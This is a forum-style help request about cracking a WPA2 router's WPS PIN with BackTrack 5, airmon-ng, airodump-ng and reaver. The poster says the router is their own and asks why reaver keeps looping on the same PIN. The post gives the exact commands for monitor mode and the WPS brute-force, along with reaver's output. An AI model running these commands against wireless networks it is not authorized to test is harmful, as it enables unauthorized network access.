I have downloaded the last version, "BT5R3-GNOME-32.iso" with MD5 aafff8ff5b71fdb6fccdded49a6541a0 and created an USB Disk.

Found my Wireless Card with : "iwconfig"

Put my wireless card on monitor mode with: "airmon-ng start wlan0"

Found the BSSID of my router that I want to crack. It is one Thomson DWG850-4B. I set up its configuration to WPA2, Cipher: CCMP, Authentication: PSK.
I first tried to use "airodump-ng wlan0" but it didn't work, and than I tried "airodump-ng mon0" which worked out and I was able to see my router BSSID.

Once I checked that I could see my router, I sent: "reaver -i mon0 -b BSSID -vv".
It is important to mention that I'm not conected to the internet trough my wireless router. My notebook doesn't have it's connection on it.

I received the following messages:

[+] Waiting for Beacon from bssid
[+] Switching mon0 to channel 11
[+] Associated with bssid (ESSID: xxxxxxx)

I left the computer for over 12 hours runing, but nothing was showing on the screen.

Than, I decided to open another command windows and sent instruction "airodump-ng mon0". I was trying to see if I was still able to see my router, when I realized that with this other screen running, the previous one strart working and issuing the following informations:

[+] Trying Pin 12345670
[+] Sending EAPOL START Request
[+] Receiving identity request
[+] Sending identity response
[+] Receiving identity request
[+] Sending identity response
[!] WARNING: Receive timeout ocurred
[+] Sending WSC NACK
[!] WPS Transaction failed (code: 0x02), re-trying last pin

. . .

[!] WARNING: 10 failed connection in a row

And re-start again with same Pin, 12345670.

It is in this loop.

Weard, because reaver is working only with another command windows running "airodump-ng mon0" and doesn't leave this PIN.

What should I do from this point ?